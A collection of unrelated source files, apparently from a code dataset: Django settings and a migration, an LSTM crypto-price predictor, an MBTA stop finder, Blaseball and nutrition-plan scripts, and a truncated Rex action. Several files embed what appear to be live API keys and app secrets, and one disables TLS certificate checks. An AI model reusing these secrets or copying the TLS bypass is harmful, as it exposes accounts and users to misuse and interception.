+{"seq_id":"637903783","text":"from pinry.settings import *\n\nimport os\n\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(SITE_ROOT, 'development.db'),\n }\n}\n\nSECRET_KEY = 'ZDQyMDBjZDYtYjVlZS00ZGEzLWJlMzktMWVhM2Q0NDM4OWIz'\n\n# facebook config\nFACEBOOK_APP_ID = '434190746638873'\nFACEBOOK_API_SECRET = '7301d5cd2d4d29ae0474b762490ab42c'\nFACEBOOK_EXTENDED_PERMISSIONS = ['publish_stream']\n\n# twitter config\nTWITTER_CONSUMER_KEY = 'j9QEx1MjA9nOi2rlS5fFg'\nTWITTER_CONSUMER_SECRET = 'irBDnv1HM0eHxxcVJUJG53g42s8qRFs9yA1VUjVRcRM'\n","sub_path":"pinry/settings/development.py","file_name":"development.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"307807325","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('accounts', '0002_auto_20150321_2315'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Holding',\n fields=[\n ('id', models.AutoField(auto_created=True, serialize=False, verbose_name='ID', primary_key=True)),\n ('symbol', models.CharField(max_length=10)),\n ('quantity', models.DecimalField(default=-1, decimal_places=2, max_digits=8)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AlterField(\n model_name='account',\n name='account_type',\n field=models.IntegerField(choices=[(0, 'brokerage'), (1, 'ira'), (2, 'roth ira'), (3, '401k'), (4, 'roth 401k')], default=0),\n preserve_default=True,\n ),\n ]\n","sub_path":"financemanagerapi/accounts/migrations/0003_auto_20150322_0010.py","file_name":"0003_auto_20150322_0010.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"484000543","text":"from c2_bicycle_classes import *\n\ncust = [customers(\"deah\",500), customers(\"thas\",200), customers(\"rehm\",1000)]\n\nwheel_list=[wheels('26\"\"',3,30),\n wheels('28\"\"',5,90),\n wheels('24\"\"',5,180)]\n \nframes_list=[frames('aluminium',14,60),\n frames('carbon',12,60),\n frames('steel',16,250)]\n\nman1_model=['harry','rosa','birdy']\nman2_model=['cube','merlin','iride']\n\nman1=manufacturer(\"Derby\",wheel_list,frames_list,man1_model,1.3)\nman2=manufacturer(\"Avanti\",wheel_list,frames_list,man2_model,1.2)\ncycle=bicycle(man1.model,man2.model)\nshop=bikeshop(\"costco\",cycle.m1)\n\nprint(\"\\nInitial Inventory\")\nshop.stock()\n\nprint(\"\\ncustomers list\")\nfor customer in cust:\n afford=shop.afford(customer.name,customer.fund)\n\nprint(\"inventory after sales\")\nshop.stock()\nprint(\"\\nProfit ${}\".format(int(shop.t)))\n","sub_path":"c2_main.py","file_name":"c2_main.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"557711829","text":"# -*- coding: utf-8 -*-\nimport os\nimport sys\nsys.path.append(os.path.join(os.path.dirname(__file__), \"../\"))\nimport pandas\nimport matplotlib.pyplot as plt\nimport data_loader\nimport numpy\nimport math\nimport argparse\nimport keras\nimport plotly.offline as py\nimport plotly.graph_objs as go\nfrom keras.optimizers import Adam\nimport logging\n\nfrom keras.callbacks import ModelCheckpoint\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import LSTM\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.externals import joblib\nfrom keras.callbacks import CSVLogger\n\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(level=logging.INFO)\n\ncheckpoint_name = 'model1'\n\nif not os.path.isdir(os.path.join(os.path.dirname(__file__), 'checkpoint/{}'.format(checkpoint_name))):\n dire = os.path.join(os.path.dirname(__file__), 'checkpoint/')\n os.system(\"cd {}; mkdir {}\".format(dire, checkpoint_name))\n\nparser = argparse.ArgumentParser(description='Predict crypto prices')\nparser.add_argument('-v', '--visualize', action='store_const',\n const=True, default=False,\n help='Only visualize results of previously saved model')\nparser.add_argument('-r', '--resume', action='store_const',\n const=True, default=False,\n help='resume from previous checkpoint')\n\nargs = parser.parse_args()\n\n\n\"\"\"Get Data\"\"\"\ndataset = data_loader.getCandles('ETH-USD', 60, '2018-02-01T00:00:25+01:00', '2018-05-01T00:00:25+01:00')[['open']]\n\n\"\"\"###Normalize data\"\"\"\n\n# normalize the dataset\nscaler = MinMaxScaler(feature_range=(0, 1))\nscaler.fit(dataset)\ndataset = scaler.transform(dataset)\nscaler_path = os.path.join(os.path.dirname(__file__), 'checkpoint/{}/scaler.pkl'.format(checkpoint_name))\njoblib.dump(scaler, scaler_path)\n\n\"\"\"###Split data into training and test. 
Training is the past, test is the future.\"\"\"\n\n# split into train and test sets\ntrain_size = int(len(dataset) * 0.7)\ntest_size = len(dataset) - train_size\ntrain, test = dataset[0:train_size,:], dataset[train_size:len(dataset),:]\nprint(len(train), len(test))\n\n\"\"\"###Convert data into pairs: (features, targets)\"\"\"\n\n# convert an array of values into a dataset matrix\ndef create_dataset(dataset, look_back=1):\n\tdataX, dataY = [], []\n\tfor i in range(len(dataset)-look_back-1):\n\t\ta = dataset[i:(i+look_back), 0]\n\t\tdataX.append(a)\n\t\tdataY.append(dataset[i + look_back, 0])\n\treturn numpy.array(dataX), numpy.array(dataY)\n\n\n# reshape into X=t and Y=t+1\nlook_back = 1\ntrainX, trainY = create_dataset(train, look_back)\ntestX, testY = create_dataset(test, look_back)\n\nprint(testY.shape)\nprint(testY)\n\"\"\"###Reshape data to fit the LSTM expected format (samples, time_steps, features)\"\"\"\n# reshape input to be [samples, time steps, features]\ntrainX = numpy.reshape(trainX, (trainX.shape[0], 1, trainX.shape[1]))\ntestX = numpy.reshape(testX, (testX.shape[0], 1, testX.shape[1]))\nprint(trainX.shape)\nprint(testX.shape)\n\n\"\"\"###Build a stacked LSTM (two 256-unit layers) connected to a 1 neuron output layer:\"\"\"\n\n# create and fit the LSTM network\nmodel = Sequential()\n# model.add(LSTM(4, input_shape=(1, look_back)))\nmodel.add(LSTM(256, input_shape=(1, look_back), return_sequences=True))\nmodel.add(LSTM(256))\n# model.add(LSTM(4, batch_input_shape=(1, 1, look_back), stateful=True))\nmodel.add(Dense(1))\n\nmodel.summary()\n\n\n\"\"\"### Checkpointing \"\"\"\ncheckpoint_path = os.path.join(os.path.dirname(__file__), 'checkpoint/{}/weights.hdf5'.format(checkpoint_name))\nmodel_path = os.path.join(os.path.dirname(__file__), 'checkpoint/{}/model.hdf5'.format(checkpoint_name))\ncheckpointer = ModelCheckpoint(filepath=checkpoint_path, verbose=1, save_best_only=True)\ncsv_logger = CSVLogger(model_path+\".log\")\n\nif args.resume and os.path.isfile(checkpoint_path) and os.path.isfile(model_path):\n    # Sequential has no .load() method; the architecture is rebuilt above,\n    # so restoring the checkpointed weights is enough to resume\n    model.load_weights(checkpoint_path)\n    print('Loaded weights from checkpoint: {}'.format(checkpoint_path))\nelse:\n    print('No checkpoint found.')\n\n\n\"\"\"###Define the loss and optimizer. 
Train the model.\"\"\"\nadam = Adam(lr=0.001, beta_1=0.9, beta_2=0.999, epsilon=None, decay=1e-6, amsgrad=False)\nmodel.compile(loss='mean_squared_error', optimizer=adam, metrics=['MSE', 'MAE', 'MAPE'])\n\nif not args.visualize:\n model.fit(trainX,\n trainY,\n epochs=20,\n batch_size=1,\n verbose=1,\n validation_data=(testX, testY),\n callbacks=[checkpointer, csv_logger])\n\nmodel_path = os.path.join(os.path.dirname(__file__), 'checkpoint/{}/model.hdf5'.format(checkpoint_name))\nmodel.save(model_path)\n\n\"\"\"###Now check the predicted values for training and test data\"\"\"\n\n# make predictions\ntrainPredict = model.predict(trainX, batch_size=1)\ntestPredict = model.predict(testX, batch_size=1)\n\n# invert predictions\ntrainPredict = scaler.inverse_transform(trainPredict)\ntrainY = scaler.inverse_transform([trainY])\ntestPredict = scaler.inverse_transform(testPredict)\ntestY = scaler.inverse_transform([testY])\n\n# calculate root mean squared error\ntrainScore = math.sqrt(mean_squared_error(trainY[0], trainPredict[:,0]))\nprint('Train Score: %.2f RMSE' % (trainScore))\ntestScore = math.sqrt(mean_squared_error(testY[0], testPredict[:,0]))\nprint('Test Score: %.2f RMSE' % (testScore))\n\n\n# shift train predictions for plotting\ntrainPredictPlot = numpy.empty_like(dataset)\ntrainPredictPlot[:, :] = numpy.nan\n# trainPredictPlot[look_back:len(trainPredict)+look_back, :] = trainPredict\ntrainPredictPlot[:len(trainPredict), :] = trainPredict\n\n# shift test predictions for plotting\ntestPredictPlot = numpy.empty_like(dataset)\ntestPredictPlot[:, :] = numpy.nan\n# testPredictPlot[len(trainPredict)+(look_back*2)+1:len(dataset)-1, :] = testPredict\ntestPredictPlot[len(trainPredict)+2:len(trainPredict)+len(testPredict)+2, :] = testPredict\n\n\n\n\"\"\"Training Graphs\"\"\"\ndata = go.Scatter(\n x=pandas.DataFrame(scaler.inverse_transform(dataset)).index,\n y=pandas.DataFrame(scaler.inverse_transform(dataset))[0],\n name='Original Data'\n)\n\ntrain = go.Scatter(\n x=pandas.DataFrame(trainPredictPlot).index,\n y=pandas.DataFrame(trainPredictPlot)[0],\n name='Train Predict Data'\n)\n\ntest = go.Scatter(\n x=pandas.DataFrame(testPredictPlot).index,\n y=pandas.DataFrame(testPredictPlot)[0],\n name='Test Predict Data'\n)\n\ndata_plot = [data, train, test]\nfig = go.Figure(data=data_plot)\npy.plot(fig, filename=os.path.join(os.path.dirname(__file__), '../plots/{}.html'.format(checkpoint_name)))\n","sub_path":"prediction/price.keras.py","file_name":"price.keras.py","file_ext":"py","file_size_in_byte":6510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
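A toy illustration of the windowing that create_dataset (defined in the script above) performs: with look_back=1 each sample is a single value and the target is the value that follows it.

import numpy as np

series = np.array([[0.1], [0.2], [0.3], [0.4]])
X, y = create_dataset(series, look_back=1)  # uses the helper defined in the script above
print(X)  # [[0.1] [0.2]] -- the loop stops at len(dataset) - look_back - 1
print(y)  # [0.2 0.3]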
+{"seq_id":"205926283","text":"import urllib.request\nimport json\nfrom pprint import pprint\nimport ssl\nssl._create_default_https_context = ssl._create_unverified_context\n\n# Useful URLs (you need to add the appropriate parameters for your requests)\nMAPQUEST_BASE_URL = \"http://www.mapquestapi.com/geocoding/v1/address\"\nMBTA_BASE_URL = \"https://api-v3.mbta.com/stops\"\n\n# Your API KEYS (you need to use your own keys - very long random characters)\nMAPQUEST_API_KEY = \"s8MaFUrVtApmTesoZ4efmGl5PrrPOQmZ\"\nMBTA_API_KEY = \"fe4b0d61891d43bfa69d756c33130954\"\n\n# A little bit of scaffolding if you want to use it\n\n\ndef get_json(url):\n \"\"\"\n Given a properly formatted URL for a JSON web API request, return\n a Python JSON object containing the response to that request.\n \"\"\"\n f = urllib.request.urlopen(url)\n response_text = f.read().decode('utf-8')\n response_data = json.loads(response_text)\n return response_data\n\n\ndef get_lat_long(place_name):\n \"\"\"\n Given a place name or address, return a (latitude, longitude) tuple\n with the coordinates of the given place.\n See https://developer.mapquest.com/documentation/geocoding-api/address/get/\n for Mapquest Geocoding API URL formatting requirements.\n \"\"\"\n place_name = str(place_name)\n place_name = place_name.replace(\" \", \"%20\")\n place_name = f\"{place_name},MA\"\n url = f'http://www.mapquestapi.com/geocoding/v1/address?key={MAPQUEST_API_KEY}&location={place_name}'\n json_data = get_json(url)\n coordinates = json_data[\"results\"][0][\"locations\"][0][\"latLng\"]\n latitude = coordinates[\"lat\"]\n longitude = coordinates[\"lng\"]\n return latitude, longitude\n\n\ndef get_nearest_station(latitude, longitude):\n \"\"\"\n Given latitude and longitude strings, return a (station_name, wheelchair_accessible)\n tuple for the nearest MBTA station to the given coordinates.\n See https://api-v3.mbta.com/docs/swagger/index.html#/Stop/ApiWeb_StopController_index for URL\n formatting requirements for the 'GET /stops' API.\n \"\"\"\n url = f\"https://api-v3.mbta.com/stops?api_key={MBTA_API_KEY}&sort=distance&filter%5Blatitude%5D={latitude}&filter%5Blongitude%5D={longitude}\"\n data = get_json(url)\n try:\n name = data[\"data\"][0][\"attributes\"][\"name\"]\n wheelchair_accessible = data[\"data\"][0][\"attributes\"][\"wheelchair_boarding\"]\n except:\n return \"MBTA Not Available\"\n if wheelchair_accessible == 0:\n wheelchair_accessible = \"No Information\"\n elif wheelchair_accessible == 1:\n wheelchair_accessible = \"Accessible\"\n else:\n wheelchair_accessible = \"Inaccessible\"\n return f\"Station: {name}, Wheelchair Accessibility: {wheelchair_accessible}\"\n\n\ndef find_stop_near(place_name):\n \"\"\"\n Given a place name or address, return the nearest MBTA stop and whether it is wheelchair accessible.\n \"\"\"\n location_data = get_lat_long(place_name)\n latitude = location_data[0]\n longitude = location_data[1]\n return get_nearest_station(latitude, longitude)\n\n\n\ndef main():\n \"\"\"\n You can test all the functions here\n \"\"\"\n place = str(input(\"Please enter your location: \"))\n print(find_stop_near(place))\n \n\nif __name__ == '__main__':\n main()","sub_path":"mbta_helper.py","file_name":"mbta_helper.py","file_ext":"py","file_size_in_byte":3181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"297787705","text":"import requests\nimport json\nfrom string import Template\n\nheaders = {\"User-Agent\": \"plostcards (chef#1911)\"}\nvalid_divisions = [\n # \"d4cc18de-a136-4271-84f1-32516be91a80\", # Wild High\n # \"456089f0-f338-4620-a014-9540868789c9\", # Mild High\n # \"98c92da4-0ea7-43be-bd75-c6150e184326\", # Wild Low\n # \"fadc9684-45b3-47a6-b647-3be3f0735a84\", # Mild Low\n \"3c34edad-4d24-40f4-b216-672d4dcbf70e\", # Vault\n \"045fb323-43ec-4114-8b74-4bc0927e5947\", # Hall\n \"5d80f2b8-9a4d-46af-af1c-f520ff59a5f3\", # Horizon\n \"7139575e-61d7-43f1-9b9e-6bf892cdce0f\", # Desert\n]\n\nprint(\"GET https://blaseball.com/database/simulationData\")\nsimData = requests.get(\n \"https://blaseball.com/database/simulationData\", headers=headers\n).json()\n# MOCK: simData = {\"season\": 22}\n\nprint(\"GET https://www.blaseball.com/database/season?number=\" + str(simData[\"season\"]))\nseasonData = requests.get(\n \"https://www.blaseball.com/database/season?number=\" + str(simData[\"season\"]),\n headers=headers,\n).json()\n\nprint(\"GET https://www.blaseball.com/database/playoffs?number=\" + str(simData[\"season\"]))\nplayoffsData = requests.get(\n \"https://www.blaseball.com/database/playoffs?number=\" + str(simData[\"season\"]),\n headers=headers,\n).json()\n\nprint(\"GET https://www.blaseball.com/database/standings?id=\" + seasonData[\"standings\"])\nstandingsData = requests.get(\n \"https://www.blaseball.com/database/standings?id=\" + seasonData[\"standings\"],\n headers=headers,\n).json()\n\nprint(\"GET https://www.blaseball.com/database/allTeams\")\nallTeamsData = requests.get(\n \"https://www.blaseball.com/database/allTeams\", headers=headers\n).json()\n\nprint(\"GET https://www.blaseball.com/database/allDivisions\")\ndivisionsData = requests.get(\n \"https://www.blaseball.com/database/allDivisions\", headers=headers\n).json()\n\nprint(\"GET https://www.blaseball.com/database/feed/global?&limit=20&sort=3\")\nfeedData = requests.get(\n \"https://www.blaseball.com/database/feed/global?&limit=20&sort=3\", headers=headers\n).json()\n\nteams = []\nfor t in allTeamsData:\n team = {}\n team[\"id\"] = t[\"id\"]\n team[\"location\"] = t[\"location\"]\n team[\"nickname\"] = t[\"nickname\"]\n team[\"fullName\"] = t[\"fullName\"]\n team[\"losses\"] = (\n standingsData[\"losses\"][t[\"id\"]] if t[\"id\"] in standingsData[\"losses\"] else 0\n )\n team[\"wins\"] = (\n standingsData[\"wins\"][t[\"id\"]] if t[\"id\"] in standingsData[\"wins\"] else 0\n )\n team[\"gamesPlayed\"] = (\n standingsData[\"gamesPlayed\"][t[\"id\"]]\n if t[\"id\"] in standingsData[\"gamesPlayed\"]\n else 0\n )\n team[\"emoji\"] = t[\"emoji\"]\n teams.append(team)\n\nprint(json.dumps(teams, indent=2))\n\ndivisions = []\nfor d_id in valid_divisions:\n d = [div for div in divisionsData if div[\"id\"] == d_id][0]\n division = {}\n division[\"name\"] = d[\"name\"]\n division[\"id\"] = d[\"id\"]\n division[\"teams\"] = [t for t in teams if t[\"id\"] in d[\"teams\"]]\n division[\"teams\"].sort(key=lambda x: x[\"wins\"], reverse=True)\n divisions.append(division)\n\nprint(json.dumps(divisions, indent=2))\n\nlatex_division = Template(\" \\\\multicolumn{2}{ c }{\\\\large{$name}} \\\\\\\\\\n\")\nlatex_standing = Template(\" $name & $wins ($games)\\\\\\\\\\n\")\nstandings = \"\"\nfor division in divisions:\n standings += \" \\\\begin{tabular}{ l c }\\n\"\n standings += latex_division.substitute(name=division[\"name\"])\n for team in division[\"teams\"]:\n standings += latex_standing.substitute(\n name=team[\"fullName\"],\n 
wins=team[\"wins\"],\n games=f\"{team['gamesPlayed']-team['losses']}-{team['losses']}\",\n )\n standings += \" \\\\end{tabular}\\n\"\n standings += \" \\\\vspace{8px}\\n\"\n\nlatex_feed = Template(\" S$season-$day & $description\\\\\\\\\")\nfeed = \"\"\nfor f in feedData:\n feed += latex_feed.substitute(season=f[\"season\"]+1, day=f[\"day\"]+1, description=f[\"description\"]).encode(\"ascii\", \"ignore\").decode(\"ascii\").replace(\"\\n\",\"\\\\\\\\\") + \"\\n\"\n \nplayoffs_winner = [team for team in teams if team[\"id\"] == playoffsData[\"winner\"]][0]\n\nwith open(\"sunday.template\", \"r\") as fd:\n template = fd.read()\n with open(\"sunday.tex\", \"w\") as wd:\n wd.write(Template(template).substitute(standings=standings, feed=feed, season=str(simData[\"season\"]+1), winner=playoffs_winner[\"fullName\"]))\n","sub_path":"sunday.py","file_name":"sunday.py","file_ext":"py","file_size_in_byte":4265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"194161519","text":"import xml.etree.ElementTree as ET\nimport sys\nimport nutrigenf\nimport nutrigen_gui\n# import os.path\n\n# default file input output folder\nstrBasePath = nutrigenf.getVar(\"basepath\")\n\n# get parameters\nprogram_name = sys.argv[0]\nparameters = sys.argv[1:]\nargCount = len(parameters)\n\n# check command line parameters\nif argCount == 0:\n nutrigenf.ngError(\"CIREQ\", \"None specified.\")\n quit()\n\nif argCount >= 1:\n # print (\"Plan file specified %s\" % (sys.argv[1]))\n strClientID= sys.argv[1]\n # strPlanFile = strBasePath + sys.argv[1] + \".xml\"\n\n # if os.path.isfile(strPlanFile) != True:\n # print (\"File not found - %s\" % strPlanFile)\n # quit()\n\n# open file\n# tree = ET.parse(strPlanFile)\n# doc = tree.getroot()\nstrXML = nutrigenf.getPendingPlanXML(strClientID)\nif strXML == None:\n nutrigenf.ngError(\"NOXML\", \"Please try compiling.\")\n quit()\n\ndoc = ET.fromstring(strXML)\n\n# declare\nintBCalories = 0\nintBQuantity = 0\nintLCalories = 0\nintLQuantity = 0\nintDCalories = 0\nintDQuantity = 0\nintSCalories = 0\nintSQuantity = 0\n\nfor items in doc:\n\n # at this level we'll find the 5 top level elements\n # meta rda-ai chart nutrients deficiencies\n\n # traverse meta container\n if items.tag == \"meta\":\n for meta in items:\n # in this, we'll find the time stamp, the session id and\n # the client subcontainer.\n if meta.tag == \"disclaimer\": strDisclaimer = meta.text\n if meta.tag == \"wantplantext\": strWantPlanText = meta.text\n if meta.tag == \"wantplanlink\": strWantPlanLink = meta.text\n if meta.tag == \"instructions\": strInstructions = meta.text\n\n if meta.tag == \"client\":\n for clientinfo in meta:\n # assign the text of various tags to variables\n if clientinfo.tag == \"name\": strClientName = clientinfo.text\n if clientinfo.tag == \"age\": strClientAge = clientinfo.text\n if clientinfo.tag == \"height\": fpClientHeight = float(clientinfo.text)\n if clientinfo.tag == \"weight\": fpClientWeight = float(clientinfo.text)\n if clientinfo.tag == \"mealtype\": strClientPlanType = clientinfo.text\n if clientinfo.tag == \"medical-issues\": strClientMI = clientinfo.text\n if clientinfo.tag == \"contraindications\": strClientCI = clientinfo.text\n if clientinfo.tag == \"bmr\": intClientBMR = int(float(clientinfo.text))\n if clientinfo.tag == \"bmi\": intClientBMI = int(float(clientinfo.text))\n if clientinfo.tag == \"age-range\": strClientAgeRange = clientinfo.text\n if clientinfo.tag == \"gender\": strClientGender = clientinfo.text\n if clientinfo.tag == \"bmi-category\": strClientBMICat = clientinfo.text\n if clientinfo.tag == \"recommended-calories\": intClientRecCalories = int(float(clientinfo.text))\n if clientinfo.tag == \"daily-water\": fpClientDailyWater = float(clientinfo.text)\n if clientinfo.tag == \"daily-fiber\": intClientDailyFiber = int(float(clientinfo.text))\n\n # traverse rda-ai tags\n if items.tag == \"rda-ai\":\n # in this we'll find various nutrient names and their values within\n # simple element containers.\n for nutrient in items:\n if nutrient.tag == \"vitamin-a\": rVitaminA = float(nutrient.text)\n if nutrient.tag == \"vitamin-c\": rVitaminC = float(nutrient.text)\n if nutrient.tag == \"vitamin-d\": rVitaminD = float(nutrient.text)\n if nutrient.tag == \"vitamin-e\": rVitaminE = float(nutrient.text)\n if nutrient.tag == \"vitamin-k\": rVitaminK = float(nutrient.text)\n if nutrient.tag == \"vitamin-b6\": rVitaminB6 = float(nutrient.text)\n if nutrient.tag == \"vitamin-b12\": rVitaminB12 = 
float(nutrient.text)\n if nutrient.tag == \"molybdenum\": rMolybdenum = float(nutrient.text)\n if nutrient.tag == \"manganese\": rManganese = float(nutrient.text)\n if nutrient.tag == \"magnesium\": rMagnesium = float(nutrient.text)\n if nutrient.tag == \"sodium\": rSodium = float(nutrient.text)\n if nutrient.tag == \"chloride\": rChloride= float(nutrient.text)\n if nutrient.tag == \"choline\": rCholine = float(nutrient.text)\n if nutrient.tag == \"biotin\": rBiotin = float(nutrient.text)\n if nutrient.tag == \"fluoride\": rFluoride = float(nutrient.text)\n if nutrient.tag == \"phosphorus\": rPhosphorus = float(nutrient.text)\n if nutrient.tag == \"selenium\": rSelenium = float(nutrient.text)\n if nutrient.tag == \"zinc\": rZinc = float(nutrient.text)\n if nutrient.tag == \"iodine\": rIodine= float(nutrient.text)\n if nutrient.tag == \"iron\": rIron = float(nutrient.text)\n if nutrient.tag == \"potassium\": rPotassium = float(nutrient.text)\n if nutrient.tag == \"folate\": rFolate = float(nutrient.text)\n if nutrient.tag == \"pantothenic-acid\": rPantothenicAcid = float(nutrient.text)\n if nutrient.tag == \"copper\": rCopper = float(nutrient.text)\n if nutrient.tag == \"chromium\": rChromium = float(nutrient.text)\n if nutrient.tag == \"riboflavin\": rRiboflavin = float(nutrient.text)\n if nutrient.tag == \"calcium\": rCalcium = float(nutrient.text)\n if nutrient.tag == \"niacin\": rNiacin = float(nutrient.text)\n if nutrient.tag == \"thiamin\": rThiamin = float(nutrient.text)\n\n # traverse chart element\n if items.tag == \"chart\":\n # this only contains multiple ITEM tags, each of which\n # contain details of a single item, across multiple sub tags\n for chart in items:\n if chart.tag == \"item\":\n for itemdetails in chart:\n if itemdetails.tag == \"code\": strItemCode = itemdetails.text\n if itemdetails.tag == \"name\": strItemName = itemdetails.text\n if itemdetails.tag == \"qty\": intItemQty = int(float(itemdetails.text))\n if itemdetails.tag == \"calories\": intItemCalories = int(float(itemdetails.text))\n\n # traverse nutrients contained in plan\n if items.tag == \"nutrients\":\n # this only contains multiple ITEM tags, each of which\n # contain details of a single item, across multiple sub tags\n for chart in items:\n if chart.tag == \"nutrient\":\n for itemdetails in chart:\n if itemdetails.tag == \"nutcode\": strNutCode = itemdetails.text\n if itemdetails.tag == \"nutname\": strNutName = itemdetails.text\n if itemdetails.tag == \"nutval\": fpNutQty = float(itemdetails.text)\n if itemdetails.tag == \"nutunit\": strNutUnit = itemdetails.text\n\n if strNutCode == \"208\": fpPlanEnergy = fpNutQty\n\n # traverse plan deficiencies\n strDeficiencies = \"\"\n if items.tag == \"deficiencies\":\n # in this we'll find various nutrient names and their values within\n # simple element containers.\n for defnuts in items:\n if defnuts.tag == \"def-nutrient\":\n strDeficiencies = strDeficiencies + defnuts.text + \\\n \" (\" + nutrigenf.getNutrientCode(defnuts.text) + \"), \"\n\n # remove trailing comma from deficiencies string\n strDeficiencies = strDeficiencies.strip()\n strDeficiencies = strDeficiencies[:-1]\n\n # write to PDF when done.\n\n# print stuff here\nstrClientInfo = \" %s \\n %s, %s yrs, %s cm, %s kg (%s:%s), %s \" % \\\n (strClientName, strClientGender, strClientAge, fpClientHeight, \\\n fpClientWeight, intClientBMI, strClientBMICat, strClientPlanType)\n\nintClientInfoLen = len(strClientInfo)\n\nstrCalorieInfo = \" BMR/Rec/Plan Calories: %s / %s / %s \" % (intClientBMR, 
intClientRecCalories, fpPlanEnergy)\nintCalorieInfoLen = len(strCalorieInfo)\nstrCalorieInfo = strCalorieInfo + (\" \" * (intClientInfoLen - intCalorieInfoLen))\n\nstrDefInfo = \" Deficiencies: %s \" % strDeficiencies\nintDefLen = len(strDefInfo)\n\n# put the list of deficiencies into a db variable for retrieval by\n# the deficiencies program for easier usage without scrolling\nnutrigenf.putVar(\"deficiencies-temp\", strDeficiencies, \"S\")\n\n# make the deficiencies fit properly\n# (multiply by 1.0 to force float division under Python 2)\nintDefLen = intDefLen * 1.0\nintIterations = int(intDefLen / intClientInfoLen)\nfor i in range (1, intIterations+1):\n    strDefInfo = nutrigenf.stringInsert(strDefInfo, \"\\r\\n \", intClientInfoLen * i)\n\n# make the contraindications etc fit properly\nstrCI = \" Dis/CI: %s [MI: %s]\" % (strClientCI, strClientMI)\nintCILen = len(strCI)\nintCILen = intCILen * 1.0\nintIterations = int(intCILen / intClientInfoLen)\nfor i in range (1, intIterations+1):\n    strCI = nutrigenf.stringInsert(strCI, \"\\r\\n \", intClientInfoLen * i)\n\ngui_mode = False\nif gui_mode == True:\n    nutrigen_gui.plan_summary(strClientInfo, strCalorieInfo, strCI, strDefInfo)\n\nelse:\n    print (\"\\033[37;46m\" + strClientInfo + \"\\033[0m\")\n    print (\"\\033[37;45m\" + strCalorieInfo + \"\\033[0m\")\n    # print (\"\\033[37;43m\" + strCI + \"\\033[0m\")\n    print (\"\\033[37;44m\" + strDefInfo + \"\\033[0m\")\n\n# change terminal size so plans can be seen/worked on comfortably\nif gui_mode == False:\n    sys.stdout.write(\"\\x1b[8;{rows};{cols}t\".format(rows=48, cols=intClientInfoLen + 5))\n\nquit()\n","sub_path":"plansummary.py","file_name":"plansummary.py","file_ext":"py","file_size_in_byte":9452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
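The long if-chains in plansummary.py are easy to mistype; a tag-to-converter table expresses the same traversal in a few lines. A minimal self-contained sketch of that idea with ElementTree (toy XML and a hypothetical field set, not the real plan schema):

import xml.etree.ElementTree as ET

CLIENT_FIELDS = {"name": str, "age": str, "height": float, "weight": float}

doc = ET.fromstring("<plan><meta><client>"
                    "<name>Jo</name><height>172</height>"
                    "</client></meta></plan>")
client = {}
for element in doc.iter("client"):
    for child in element:
        convert = CLIENT_FIELDS.get(child.tag)
        if convert is not None:
            client[child.tag] = convert(child.text)
print(client)  # {'name': 'Jo', 'height': 172.0}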
+{"seq_id":"13195095","text":"#\n# Copyright (c) 2016, Prometheus Research, LLC\n#\n\nfrom webob.exc import HTTPBadRequest\n\nfrom rex.core import StrVal, MaybeVal\nfrom rex.instrument import Entry, ParameterSupplier, InstrumentError\nfrom rex.forms import PresentationAdaptor\nfrom rex.widget import Field, responder, RequestURL\n\nfrom .base import AcquireEntityAction\n\n\n__all__ = (\n 'ReconcileTaskAction',\n)\n\n\nclass ReconcileTaskAction(AcquireEntityAction):\n name = 'task-reconcile'\n js_type = 'rex-acquire-actions', 'ReconcileTask'\n\n initial_channel = Field(\n MaybeVal(StrVal()),\n default=None,\n doc='The default channel to use when determining which Form to use to'\n ' display the Reconciler.',\n )\n\n def context(self):\n return (\n self.domain.record(self.entity),\n self.domain.record(),\n )\n\n @responder(url_type=RequestURL)\n def display_data(self, request):\n user = self.get_user(request)\n data = {\n 'task': {},\n 'instrument': {},\n 'forms': {},\n 'discrepancies': {},\n 'entries': [],\n 'parameters': {},\n }\n\n # Get the Task\n task_id = request.GET.get('task_id')\n if not task_id:\n raise HTTPBadRequest('Must specify task_id')\n task = user.get_object_by_uid(task_id, 'task')\n if not task:\n data['error'] = 'TASK_NOT_FOUND'\n return self.response_as_json(data)\n if not task.can_reconcile:\n data['error'] = 'CANT_RECONCILE'\n return self.response_as_json(data)\n data['task'] = task.as_dict()\n\n data['discrepancies'] = task.get_discrepancies()\n if not data['discrepancies']:\n data['error'] = 'NO_DISCREPANCIES'\n return self.response_as_json(data)\n\n data['instrument'] = task.assessment.instrument_version.definition\n data['parameters'] = ParameterSupplier.get_task_parameters(task)\n data['entries'] = [\n entry.as_dict()\n for entry in\n task.get_entries(type=Entry.TYPE_PRELIMINARY)\n ]\n\n # Find the Forms that can be used\n forms = user.find_objects(\n 'form',\n 'forms',\n instrument_version=task.assessment.instrument_version,\n )\n if not forms:\n try:\n import rex.mobile\n except ImportError:\n pass\n else:\n try:\n interactions = user.find_objects(\n 'interaction',\n 'mobile',\n instrument_version=task.assessment.instrument_version,\n )\n except NotImplementedError:\n pass\n else:\n for interaction in interactions:\n # Forcefully duck-type the Interaction into a Form\n interaction.adapted_configuration = \\\n PresentationAdaptor.adapt_form(\n interaction.channel,\n interaction.instrument_version.definition,\n interaction.form_configuration,\n )\n forms = interactions\n if not forms:\n data['error'] = 'NO_FORMS'\n 